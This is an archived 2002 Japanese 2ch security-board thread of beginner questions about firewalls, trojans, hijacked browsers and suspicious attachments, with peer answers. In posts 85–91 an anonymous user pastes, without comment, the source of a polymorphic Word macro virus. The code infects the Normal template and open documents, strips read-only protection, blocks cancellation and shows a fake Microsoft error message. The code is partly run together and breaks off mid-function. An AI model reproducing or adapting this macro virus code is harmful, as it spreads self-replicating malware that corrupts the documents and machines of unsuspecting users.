くだらねぇ質問はここに書き込め Ver2.14

このエントリーをはてなブックマークに追加
1 ◆tHfDbgsU
くだらない質問は新規でスレを立てたり
関係無いスレに書き込まずに このスレに書いてください

前スレhttp://pc.2ch.net/test/read.cgi/sec/1009795619/l50

関連リンク >>2-20
各種ファイヤーウォール ログ解析ツール 日本語化パッチ
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報などは>>2-3
関連スレ・関連板は>>3-5
その他>>4-10
ずれていたら>>1-50参照

[Ctrl]キーと[F]キーを同時に押すとページ内検索が出来ます
過去ログ等を調べるのに使ってください
2名無しさん@お腹いっぱい。:02/02/19 20:00
【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Tiny Personal Firewall http://www.tinysoftware.com/
Agnitum Outpost http://www.agnitum.com/download/outpostfree.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用)
http://server47.hypermart.net/tinyfirewall/
【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.de/downloads.html
【日本語パッチ 等】
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/
ZoneAlarm Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm

【セキュリティ チェックサイト
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

[ウィルス情報]
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
3名無しさん@お腹いっぱい。:02/02/19 20:01
[過去スレ・関連スレッド・関連板]

part2.12 http://pc.2ch.net/sec/kako/1002/10021/1002134745.html
part2.13 http://pc.2ch.net/test/read.cgi/sec/1009795619/

[無料FW]
ZoneAlarm Part4 http://pc.2ch.net/test/read.cgi/sec/1010834959/l50
Tiny Personal Firewall Part3 http://pc.2ch.net/test/read.cgi/sec/1011280883/l50
Agnitum Outpost http://pc.2ch.net/test/read.cgi/sec/997301454/l50
_■■■BlackICEスレ 2■■■_ http://pc.2ch.net/test/read.cgi/sec/1012458984/l50
SygatePersonalFireWall http://pc.2ch.net/test/read.cgi/sec/993936202/l50
[有料FW&AV]
【ノートン】インターネットセキュリティ2002 Ver.6 http://pc.2ch.net/test/read.cgi/sec/1014097407/l50
ウイルスバスター2002 Part2 http://pc.2ch.net/test/read.cgi/sec/1009212569/l50
マカフィーってだめなの!PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50
[無料AV]
AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
[その他]
☆ウィルス情報&質問 総合スレッド☆ http://pc.2ch.net/test/read.cgi/sec/1010948022/l50
スパイウエア発見専用ソフト「Ad-aware」 http://pc.2ch.net/test/read.cgi/sec/1003749900/l50
最強のファイアーウォールソフトって何かな?http://pc.2ch.net/test/read.cgi/sec/988724444/l50
最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
4名無しさん@お腹いっぱい。:02/02/19 20:01
[Windows板] 広告カットとファイヤーウォールソフ ト。http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板] 自分のパソコンへの不正侵入対策してますか?2 http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者@2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク@2ch掲示板 http://pc.2ch.net/hack/
windows@2ch掲示板 http://pc.2ch.net/win/
ソフトウェア http://pc.2ch.net/software/
ダウンロードソフト(download板) http://pc.2ch.net/download/
パソコン一般@2ch掲示板 http://pc.2ch.net/pc/

「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/

・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/


■ 初心者用質問スレッド Part7 ■ http://pc.2ch.net/test/read.cgi/sec/1013006745/l50
○ネットセキュリティー板 質問、雑談スレッド[3]○http://pc.2ch.net/test/read.cgi/sec/1006859839/l50
ファイアーウォールソフト 総合スレッド Part2 http://pc.2ch.net/test/read.cgi/sec/991646115/l50

ファイアーウォールソフト 総合スレッドhttp://yasai.2ch.net/win/kako/990/990201178.html
ネットセキュリティー板 質問、雑談スレッドhttp://ton.2ch.net/sec/kako/988/988707245.html
ネットセキュリティー板 質問、雑談スレッド[2]http://pc.2ch.net/sec/kako/999/999405173.html
くだらねぇ質問はここに書き込め Ver212 http://pc.2ch.net/sec/kako/1002/10021/1002134745.html
>>1
スレ立ておつカレー

Kerio Personal Firewallもよろしこ
Kerio Technologies Inc. | Kerio Personal Firewall
http://www.kerio.com/parser/mainpage.php?id=204&lg=1

Kerio Personal Firewall FAQ intro page
http://www.tpffaq.com/

Yahoo! Groups : keriofirewall
http://groups.yahoo.com/group/keriofirewall/
6      :02/02/19 20:18
いいハッキングツールの場所教えてください!
www.emacs.org
くれてやる
8http://www.ha.shotoku.ac.jp/cgi/h.nomura/1bbbs.cgi:02/02/19 22:19
9名無しさん@お腹いっぱい。:02/02/20 07:16
http://www.valuecommerce.ne.jp/と言うサイトにブラウザが勝手に
データを渡しに行こうとするのですが、実に覚えがありません。
他のページにいても、バックグランドで送信しようとします。
ファイアウォールがいちいち感知するので、アクセスをやめさせたいのですが、
どのような方法が有効でしょうか。
また、http://www.valuecommerce.ne.jp/とは悪意のあるサイトなのですか
ご存知の方教えてください。
接続はnetscape、FWはoutpostfirewallを使用しています。
10名無しさん@お腹いっぱい。:02/02/20 07:49
今度マンションの専用線のLAN接続になるんですが、そしたらファイアウォール
ソフトは必要ないですかね?
マンションとかだと、他のユーザー(他の部屋の人)がメールとか覗き見ることができるって聞いた。
12名無しさん@お腹いっぱい。:02/02/20 11:14
>>10
ひょっとしてキンデンのKJPSネットだったりする?
いちおう、ファイアウォールは設けられてるはずだけど、会社に
よって違うかもしれないので、聞いてみたら?

まあ個人レベルでもZONEのフリー版とか入れとけばいいんでないの?

>>11
最近はさすがに対策が施されている。
それが簡単にできちゃったら大問題でしょ。
13名無しさん@お腹いっぱい。:02/02/20 11:21
2chヤフオク板の↓のスレッドで
ヤフーオークションのパスワードを他人に見られるトロイを仕込まれる
被害にあった人のことが載っているのですが
http://kaba.2ch.net/test/read.cgi/yahoo/1014094808
被害にあってない人が今後も被害に合わないための対策方法や、
被害にあった人の今後の対策について
知恵をおかしください。
既出でしたら、該当スレッドを教えていただけないでしょうか?
宜しくおねがいします。
1413:02/02/20 11:29
ちなみに自分がやってる対策は
---------------------------------
ネットにつなぐときはゾーンアラーム(無料版)も立ち上げる。
マカフィーはアンインストールして、ウィルスバスターを買ってインストール。
www.antivirus.com/download/pattern.asp に時々行ってダウンロード
時々(だいたい週に一回くらい)パソコンの中をウィルスチェックする。
メールソフトはベッキーを使う。
メールに添付されてきた[***.exe]は即削除、もしくはウィルスチェックして削除。
IEは5.01sp2にする。
なるべくジャバスクリプトやアクチブXを切っておく。
-----------------------------------------
これくらいしかしていません。
15名無しさん@お腹いっぱい。:02/02/20 12:01
>>13,14
あー、答え言えるけれどあえて黙っとく(笑)
14の対策だけど、これで完全とは言い切れないと俺は思うね。
(というかかなり的外れ…失礼)
ヤフオクについては調べてないからはっきりしたことは
書けないけど。

最高の対策は、ヤフオク側が安全という意思表示をしない限り
使わないことじゃない?
>>15
いや、まぁそれはそうなんだけど。
でもそれは
「最高の避妊法はセックスをしないことじゃない?」と
言ってるのと同じなわけで。(´Д`)
1715:02/02/20 17:01
13のリンク先を再度見たけど、単に身内の犯行かもしれない
みたいな書き方がされてたね。だとしたら俺の勘違いかな。失礼。

>>16
極論だけど、望まない結果を避ける為には最良かもね(藁
あとは外部に漏れてこまる情報は入力しないで使うとか。
18どなたか教えてください:02/02/20 17:23
"*********" <_****380@ 2月19日 41KB Re:

上記メールがwebメールに届きましたが開くと、開けず、一瞬何かを送信したよな
気がしてます。コレの正体って誰かわかりませんか ? DLLすると、拡張子は
aspなんです。変なメールじゃないと信じたいのですが、教えてください。
キッスしなければ妊娠しないよ。童貞君たちは何もわかっちゃいないな。
20名無しさん@お腹いっぱい。:02/02/20 17:42
19はどこへ向けてそのコメントを発射したのかな
21名無しさん@お腹いっぱい。:02/02/20 18:08
教えてください。
最近もの凄い勢いで私のPCにクローキングしている人がいるんです。
私のPCがレイプされそうです。
ウイルスバスター2001をインストールしているんですが、
パーソナルファイアーウォールを高に設定していれば、
私のPCの貞操は守れるのでしょうか?
ちなみに、送信元IPは210.224.230.38で送信先IPは218.46.142.229です。
どなたか教えてください。
22名無しさん@お腹いっぱい。:02/02/20 18:10
33kにファイルをズタズタにってスレはどこいった?教えてくん。
23名無しさん@お腹いっぱい。:02/02/20 18:13
ノートンって幾らや?
>>18
ウイルスチェックをしてもらわないとなんとも言えないです。
Re:という題名ならBadtransのような気もしますが・・・・
>DLLすると
ダウンロードするとという意味でいいですか?

>>21
ウイルスバスター2002なら「高」設定はありますが・・・・
クローキングについてはhttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3376
最新パターンでウイルスチェックして、検出されなければとりあえずは大丈夫です。

>>22
http://pc.2ch.net/test/read.cgi/sec/1012296560/

>>23
インターネットセキュリティなら9800円。
単体ソフトは見つけることができなかった。
25名無しさん@お腹いっぱい。:02/02/20 19:25
教えてください。
最近、宣伝掲示板やネットサ−ビス板でよく以下のような
ネットビジネスの広告を見かけます。
簡単に月5万から20万ぐらい稼げるそうなので、
やってみたいのですが、とても不安(信用できない)です。
そこでネット知識のある皆さんにお聞きし
たいのですが、このような
ネットビジネスは本当に簡単に月5万ぐらい稼げるのでしょうか?
またこちらが被害(刑事的、金銭的)を受けることも
ありえるのでしょうか?もしあれば具体的に教えてください。
よろしくお願いいたします。


http://pc.2ch.net/test/read.cgi/ad/1013176419/

http://pc.2ch.net/test/read.cgi/ad/1009506478/
26>>25:02/02/20 19:29
悪マニに逝けばきっとわかる。
http://www.makani.to/akutoku/bbs/qa/pslg13624.html
27名無しさん@お腹いっぱい。:02/02/20 21:12
24さん親切にありがとうございました。。。
28冬房:02/02/20 22:57
トロイって再セットアップしても消えないんですか?
29cheshire-cat:02/02/20 23:40
>>28
CMOSにゴミ書き込まなければ、クリーンインストールで全て解決。
30厨房でスマソです。:02/02/20 23:58
もうどうにもならないので書き込みました。
ネットにつなぐ度に、トップページが変なページに
なります。インターネットオプションで何度ももとに
戻すのですが、一旦電源を切り、再び立ち上げるとまた
そのページが自動的に出てきます。
あやしいものは削除ずみです。どうしてなのでしょう?
また、対処方法をお知りの方、お教えください。
31冬房:02/02/21 00:00
>>29さん

もう少し詳しくお願いします。。。
32名無しさん@お腹いっぱい。:02/02/21 10:17
http://Username.tripod.com/
これって大丈夫なの?
33名無しさん@お腹いっぱい。:02/02/21 16:11
>>30 Internet Explorer使ってるなら
http://homepage2.nifty.com/winfaq/c/ietrouble.html#370 で解決するはず。
3433:02/02/21 16:13
直リンで飛ばないみたいだから、上記のページの
「IE のスタートページや検索、OE の署名などが勝手に変更されます」
をクリック。
35名無しさん@お腹いっぱい。:02/02/21 16:33
日付: 2002/02/21 、 時刻: 12:37:52 、 NEC-PCuser
スクリプト遮断が疑わしい活動を検出しました。
ファイル: HELPCTR.EXE
オブジェクト: FileSystem Object
活動: GetSpecialFolder
このスクリプトは停止しました。

というメッセージがノートンの活動ログで出ました。
スクリプト停止したので今のところは問題ないようにみえますが・・
OSはMeです。PCはNECのMA80Tです。
一応googleで素人なりに検索して調べたところ
NECのHELPCTR.EXEがIE6と相性が悪いからとか、と言う情報もありましたが
やはり、ウィルス被害でしょうか?
お答え、お待ちしております。
36名無しさん@お腹いっぱい。:02/02/21 16:47
Trojan.JS.Offensive を踏んだみたいなのですが、シマンテック(ここ↓)の

http://www.symantec.com/region/jp/sarcj/data/t/trojan.js.offensive.html

レジストリ表の値が一つでも入ってると感染したということなんでしょうか??

感染してたとしたら、このレジストリ値を削除すれば解決しますか??
どなたか教えてください。
37名無しさんに接続中・・・:02/02/21 16:49
ある人からftpのアドレス教えてもらったんだけど
それに接続するとどんな情報が相手に伝わっちゃうの?




38お願いレス:02/02/21 17:04
http://zodiad.subnet.dk/image_002.jpg

JS.Exception.Exploit
をもらってしまいました。

ウイルス削除したんだけど
IEがおかしいのです。
ツール→インターネットオプションが利きません
レジストリはどこを見てどうなっていれば正常ですか?
教えてください。
40名無しさん@お腹いっぱい。:02/02/21 17:51
>>38 ウィルスチェックをした上でIEの修復を行う。
マイコンピューター → アプリケーションの追加と削除 をダブルクリック。
「Microsoft Internet Explorer** and Internet tools」を選択。
[追加と削除] ボタンをクリック。
Internet Explorer を修復する にチェックを付けて [OK]ボタンをクリック。
指示に従って最後に再起動。
4138:02/02/21 18:00
>>40
それでも直りません・・・
有賀とございました
あきらめます。
42名無しさん@お腹いっぱい。:02/02/21 18:06
IPで相手の特定できますか?
>>37
IP、アクセスした時刻、アクセスしたファイル、etc。
FTPサーバーに限らず、人を自分の家に入れるときは相手の素性をチェックしたいいのは当然でしょ。
44質問!!!!!!:02/02/21 20:47
2〜3分に一回、キャーという音と同時に、一瞬貞子みたいな子が
画面に現れるようになっちゃたんですけど、どうすれば直りますか?
教えてください。
>>44
禿げしくガイシュツですよ。
http://pc.2ch.net/test/read.cgi/pcqa/1012945529/23
を見てください。
46 :02/02/21 22:01
SSL(VER3.0)について詳しく解説しているサイトってどこかありませんか?
48名無しさん@お腹いっぱい。:02/02/21 22:50
見知らぬ方から、以下のようなメールがきました。

題名:The EyeFidelity filter plug-in software.

本文:Under the copyright laws, neither information nor the software
may be copied, in whole or part, without the written consent of
DVP Technologies Ltd., except in the normal use of the software
or to make a backup copy of the software. This exception does
not allow copies to be made for others.

そして、information.exeというファイルが添付されています。(サイズは79k)

これって、ウイルスでしょうか?
49名無しさん@お腹いっぱい。:02/02/21 22:53
ブラウザのホームをmsnにしてあったのですが、

http://www.linksummary.com/

に書き換わってました。どういうことなんでしょう?
50名無しさん@お腹いっぱい。:02/02/21 22:54
どんなにスゴイんだ?
韓国でも翻訳して発売されるらしい。
http://www.puchiwara.com/hacking/
うにゅ。
>>48 私だったら、見知らぬ人から来たメールなら、迷わずポイするけどなぁ。
>>48
本当に見知らぬ差出人だったら、普通捨てる。

とりあえずウィルスチェックかけてみたの?
>>49
このスレに解決策ありましたよ、試して味噌

●セキュ板 雑談スレッド●[4]
http://pc.2ch.net/test/read.cgi/sec/1013427349/l50
Kerioを試してみたくなったのですが、ZoneAlarmとの共存って可能でしょうか?ZoneAlarm消すのが面倒なんでそのままKerio入れちゃいたいんですが。不具合とかあるんでしょうか?よろしくお願いします。
5549:02/02/22 02:53
>>53
 あんまり気にする必要のないトラップみたいですね。
 安心しました。ありがとうございました。
5654:02/02/22 02:57
共存、できませんでした。
5757:02/02/22 05:24
長文すみません、マジレス希望します。
---
http://easyweb.easynet.co.uk/~hiros/virii99/Not/dodgy.zip

寝ぼけてこのファイルを解凍して
出てきたファイルを実行してしまったのですが、
実際PCにどんな影響が出てしまうのでしょうか?
(viriiとか書いてあるので多分ウイルスでしょう・・・(; ´Д`))

なんだかやばそうなので急いで消しましたが
どうにも心配です・・・

とりあえず再起動してOSが吹っ飛ぶとかはいやなので
今のうち必要なファイルはバックアップを取っておこうと考えてます。

ウイルス踏んだのは恐らく初めてなのでかなり心配してます。
よろしくお願いします。
これだけじゃ感染しねえべ。
TNN.NFO って? MSInfoドキュメントってなんじゃらほい?
60名無しさん@お腹いっぱい。:02/02/22 12:14
 Outlook ExpressにTCYっていう」変なメール(ウィルスかな)を
受信して以来、メールができません。Outlook Expressの画面を開くと
マウスのクリックができなくなります。解決法を教えて下さい。

61名無しさん@お腹いっぱい。:02/02/22 13:00
昨日マイコンピューターの中のDドライブ(CD-ROM)
Eドライブ(CD-RW)が無くなってしかもsafeモードになっちゃったよ。
これって、ウイルスですか?家庭内LANも全滅っぽい(泣)

しかも、WINDOWSのCDを読み込んでくれないのでフォーマットもできないよ
誰かこの状態でのフォーマット方法教えて〜〜〜〜〜〜!!!!
>>61
safeモードだからDやEがなくなったり、LANが使用できないんだと思われ。

IDEケーブル抜けてない?起動時にF8押してノーマルで起動できんか確認。

>>60
ほかのメーラーでも起きるか確認。
63名無しさん@お腹いっぱい。:02/02/22 13:13
http://zodiad.subnet.dk/image_002.jpg

このリンクを踏んだら、HDDがゴトゴトいって止まらなくなったので
あわてて強制終了させたんですが、ウイルスサイトなんでしょうか??
>>63 ガイシュツ >>38
65名無しさん@お腹いっぱい。:02/02/22 13:39
>>62
ありがとうございます。今、起動したらなぜか直ってた。???
再現性があるかどうか、様子みてみます。多謝
直リンクしようとするとpinktowerってとこに
直リンしようとしたアドレスが出て一々そこをクリックしていってるんですが
これがブラクラなんでしょうか?またこれを無くす方法知ってる方教えてください
もう一度まとめて質問し直してくれ。高卒なもんで意味がよくわからん。>>66
68 :02/02/22 18:38
 
69名無しさん@お腹いっぱい。:02/02/22 19:22
>>67
そこはエロ動画に自動リンクしてるサイトだ。
>>66
半角板行って聞いた方がいいよ。部落らと違うと思うけど。
>>66
リンクが直じゃなくて http://ime.nu/ 経由するってことだろ。
ブラクラじゃない(w し、2chの仕様なんで変えられん。

「おめーら!外部へのリンクだぞ!ホントに踏むのか?!飛んでイイノカ?」
と…冷静になることを促しているのだ。
71 :02/02/22 19:54
>>70
君、適当なこというと叩かれるよ。
初級ネットに逝った方がいいよ。
>>71
 なんで?>>66をもう一度読んでみて。
>>71
>>66の日本語が変なだけで、言いたいことは
pinktowerへの直リンを貼ったつもりが、リンク先は
直リンしようとした(pinktowerの)アドレスが出て
それをいちいちクリックしないと行けない、
この症状ブラクラですか?…と訊いてるわけでしょ?
なんで叩かれるの?
74名無しさん@お腹いっぱい。:02/02/22 20:34
おーい!!
>>71 さん、初級ネット板に逃げたのか?
>>69に半角版に誘導され、そのまま質問のことは忘れて動画漁りに精を出しているのでは。
勘違い。>>71さんね。
71ではないが、>>66 のもとの質問は、
http://pc.2ch.net/test/read.cgi/sec/1014356873/1
 どの直リンクリックしても変なアダルトページに
 飛ばされるんだけど・・・
 どゆことでしょう?pinktowerってとこなんですが・
だったので、逆にAという直リンを踏むとpinktowerにAという
アドレスが出てクリックしないといけない、この症状ブラクラですか?
っていう意味だと思ったんだけど。どこで貼ってあった直リンかどこへの
直リンかわからないので答えようがないと思うんだけどなあ。
>>66ってそのスレの1と同一人物?
こっちでは質問の内容が違うような気がするが…。
8066:02/02/22 21:03
半角板で聞いてみます。ご迷惑おかけしました。
どっちにしても「くだらねぇ質問」だな…は〜ぁ、メシにすっか。
82名無しさん@お腹いっぱい。 :02/02/22 22:16
>>66
2chからの直リンをわからないようにするためにpinktowerを一回クッションに
しているだけで危険はない。
今は、ime.nu に統一されている感あり。
83名無しさん@お腹いっぱい。:02/02/23 00:04
KANって何処に行ったのですか?
84 :02/02/23 01:52
ルータ使うとプライベートIPに変換されるっていうのはアタックされることが
ないからファイヤーウォールとか使わなくても大丈夫なの?
85 :02/02/23 02:28
Attribute VB_Name = "EVOLA"
Public Source As String
Public ByeMacro As String
Public Hostinf As Boolean
Public FileInf As Boolean
Public FExport As String
Public PMExport As String
Public PMFile_Yes As Boolean
Public Ex_Yes As Boolean
Public Filename As String
Public FileID As String
Public FileID2 As String
Public Virname As String
Public FC_There As Boolean
Public FO_There As Boolean
Public FP_There As Boolean
Public FN_There As Boolean
Public FS_There As Boolean
Public FSA_There As Boolean
Public VrusName As String
Public Armor As Boolean
Function Self_Recognition()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Open "C:\windows\system\vnames.cpl" For Input As #1
Do
Line Input #1, Virname
For Z = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(Z).Name <> "ThisDocument" Then
If Virname = ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo lost
If Virname <> ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo newname
newname:
Close #1
Open "C:\windows\system\vnames.cpl" For Append As #1
Print #1, ActiveDocument.VBProject.VBComponents(Z).Name
Close #1
End If
If ActiveDocument.VBProject.VBComponents(Z).Name = "ThisDocument" Then GoTo lost
lost:
Next Z
Loop Until EOF(1)
Close #1
Dim Lib
Open "C:\windows\system\vnames.cpl" For Input As #1
Do
Line Input #1, Virname
For Lib = 1 To
86 :02/02/23 02:29
NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(Lib).Name = "ThisDocument" Then GoTo skip
If NormalTemplate.VBProject.VBComponents(Lib).Name = Virname Then Hostinf = True: GoTo doccheck
skip:
Next Lib
Loop Until EOF(1)
doccheck:
Close #1
Open "C:\windows\system\vnames.cpl" For Input As #1
Do
Line Input #1, Virname
For Lib = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(Lib).Name = "ThisDocument" Then GoTo nope
If ActiveDocument.VBProject.VBComponents(Lib).Name = Virname Then FileInf = True: GoTo leave
If ActiveDocument.VBProject.VBComponents(Lib).Name <> Virname Then FileInf = False:
nope:
Next Lib
Loop Until EOF(1)
FileInf = False
leave:
Close #1
End Function
Function Armor_Status()
Application.EnableCancelKey = wdCancelDisabled
If GetAttr(NormalTemplate.FullName) = vbReadOnly Then Armor = True
Offense:
If Armor = True Then SetAttr (NormalTemplate.FullName), vbNormal
Armor = False
End Function
Function Export_Code()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
FExport = Dir("C:\windows\system\export.sys")
If FExport = "Export.sys" Then Ex_Yes = True
If Ex_Yes = False Then GoTo Morph Else GoTo Recognize
Morph:
Randomize Timer
q = Int(Rnd(1) * 5) + 1
For vi = 1 To q
x = Int(Rnd(1) * 26)
If x = 1 Then a$ = "A"
If x = 2
87 :02/02/23 02:31
Then a$ = "B"
If x = 3 Then a$ = "C"
If x = 4 Then a$ = "D"
If x = 5 Then a$ = "E"
If x = 6 Then a$ = "F"
If x = 7 Then a$ = "G"
If x = 8 Then a$ = "H"
If x = 9 Then a$ = "I"
If x = 10 Then a$ = "J"
If x = 11 Then a$ = "K"
If x = 12 Then a$ = "L"
If x = 13 Then a$ = "M"
If x = 14 Then a$ = "N"
If x = 15 Then a$ = "O"
If x = 16 Then a$ = "P"
If x = 17 Then a$ = "Q"
If x = 18 Then a$ = "R"
If x = 19 Then a$ = "S"
If x = 20 Then a$ = "T"
If x = 21 Then a$ = "U"
If x = 22 Then a$ = "V"
If x = 23 Then a$ = "W"
If x = 24 Then a$ = "X"
If x = 25 Then a$ = "Y"
If x = 26 Then a$ = "Z"
Filename = Filename + a$
Next vi
x = Int(Rnd(1) * 999) + 1
FileID = "C:\windows\system\" & Filename & x & ".cpl"
' RAPE v1.1 Export File ID Morph
Open "C:\windows\system\Export.sys" For Append As #1
Print #1, FileID
Close #1
For x = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(x).Name = "ThisDocument" Then GoTo nex
If ActiveDocument.VBProject.VBComponents(x).Name <> "ThisDocument" Then GoTo rite
rite:
Open "C:\windows\system\vnames.cpl" For Append As #1
Print #1,
88 :02/02/23 02:32
ActiveDocument.VBProject.VBComponents(x).Name
Close #1
nex:
Next x
CheckMe = Dir("C:\windows\system\PMF1199.cpl")
If CheckMe = "PMF1199.cpl" Then GoTo nextt
Do
On Error Resume Next
Open "C:\windows\system\vnames.cpl" For Input As #1
Line Input #1, Virname
NormalTemplate.VBProject.VBComponents(Virname).export FileID
ActiveDocument.VBProject.VBComponents(Virname).export FileID
Loop Until EOF(1)
nextt:
Exit Function
Recognize:
Open "C:\windows\system\Export.sys" For Input As #1
Line Input #1, FileID
Close #1
CheckMe = Dir("C:\windows\system\PMF1199.cpl")
If CheckMe = "PMF1199.cpl" Then GoTo tryharder
Do
On Error Resume Next
Open "C:\windows\system\vnames.cpl" For Input As #1
Line Input #1, Virname
NormalTemplate.VBProject.VBComponents(Virname).export FileID
ActiveDocument.VBProject.VBComponents(Virname).export FileID
Loop Until EOF(1)
tryharder:
End Function
Function Polymorphic_Check()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Open FileID2 For Input As #1
Dim FC_Check
Do
Line Input #1, FC_Check
If FC_Check = "Sub FileClose()" Then FC_There = True: GoTo FO_Look
Loop Until EOF(1)
FO_Look:
Dim FO_Check
Do
Line Input #1, FO_Check
If FO_Check = "Sub FileOpen()" Then FO_There = True: GoTo FP_Look
Loop Until EOF(1)
FP_Look:
Dim FP_Check
Do
Line Input #1, FP_Check
If FP_Check = "Sub FilePrint()" Then FP_There = True: GoTo FN_Look
Loop
89 :02/02/23 02:34
Until EOF(1)FN_Look:Dim FN_Check
Do Line Input #1, FN_Check
If FN_Check = "Sub FileNew()" Then FN_There = True: GoTo FS_Look
Loop Until EOF(1)FS_Look:Dim FS_CheckDo Line Input #1, FS_Check
If FS_Check = "Sub FileSave()" Then FS_There = True: GoTo FSA_Look
Loop Until EOF(1)
FSA_Look:Dim FSA_CheckDo Line Input #1, FSA_Check
If FSA_Check = "Sub FileSaveAs()" Then FSA_There = True: Exit Function
Loop Until EOF(1)
End Function
Function Evolve()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
'RAPE v1.1 Macro Virus Command/Code Editor - adds 1 to 6 Commands (subs)
Open "C:\windows\system\Export.sys" For Input As #1
Line Input #1, FileID2Close #1PM = Int(Rnd(1) * 150) + 1
If PM = 22 Then
If FC_There = True Then Exit Function
Open FileID2 For Append As #1
Print #1, "Sub FileClose()"
Print #1, "On error resume next"
Print #1, "Call Evolution"
Print #1, "Wordbasic.FileSave"
Print #1, "End Sub"
Close #1
End If
If PM = 73 Then
If FO_There = True Then Exit Function
Open FileID2 For Append As #1
Print #1, "Sub FileOpen()"
Print #1, "on error resume next"
Print #1, "Dialogs(wdDialogFileOpen)"
Print #1, "Call Evolution"
Print #1, "end sub"
Close #1
End If
If PM = 69 Then
If FP_There = True Then Exit Function
Open FileID2 For Append As #1
Print #1, "Sub FilePrint()"
Print #1, "on error resume next"
Print #1, "Dialogs(wdDialogFilePrint)"
Print #1, "Call Evolution"
Print #1, "End sub"
Close #1
End If
If PM = 122 Then
If FN_There = True Then Exit Function
Open FileID2 For Append As #1
Print #1, "Sub FileNew()"
Print
90 :02/02/23 02:36
#1, "on error resume next"Print #1, "Dialogs(wdDialogFileNew)"
Print #1, "Call Evolution"Print #1, "End Sub"
Close #1End IfIf PM = 90 Then
If FS_There = True Then Exit Function
Open FileID2 For Append As #1Print #1, "Sub FileSave()"
Print #1, "on error resume next"
Print #1, "call Evolution"
Print #1, "wordbasic.filesave"
Print #1, "end sub"
Close #1
End If
If PM = 8 Then
If FSA_There = True Then Exit Function
Open FileID2 For Append As #1
Print #1, "Sub FileSaveAs()"
Print #1, "on error resume next"
Print #1, "Dialogs(wdDialogFileSaveAs)"
Print #1, "Call Evolution"
Print #1, "wordbasic.filesave"
Print #1, "end sub"
Close #1
End If
End Function
Function Norminf()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Open "C:\windows\system\Export.sys" For Input As #1
Line Input #1, FileID2
Close #1
For l = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(l).Name = "ThisDocument" Then GoTo nexus
If ActiveDocument.VBProject.VBComponents(l).Name <> "ThisDocument" Then
Open "C:\windows\system\vnames.cpl" For Append As #1
Print #1, ActiveDocument.VBProject.VBComponents(l).Name
Close #1
End If
nexus:
Next l
With NormalTemplate.VBProject.VBComponents.Import(FileID2)
End With
MsgBox "An error has occurred, please save all Documents and restart Microsoft Word. If the problem persists, please contact Microsoft Technical Support.", 48
End Function
Function FileInft()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Open
91 :02/02/23 02:38
"C:\windows\system\Export.sys" For Input As #1
Line Input #1, FileID2
Close #1
With ActiveDocument.VBProject.VBComponents.Import(FileID2)
End With
Randomize Timer
WD = Int(Rnd(1) * 8) + 2
For evo = 2 To WD
x = Int(Rnd(1) * 26)If x = 1 Then a$ = "A"If x = 2 Then a$ = "B"
If x = 3 Then a$ = "C"If x = 4 Then a$ = "D"If x = 5 Then a$ = "E"
If x = 6 Then a$ = "F"
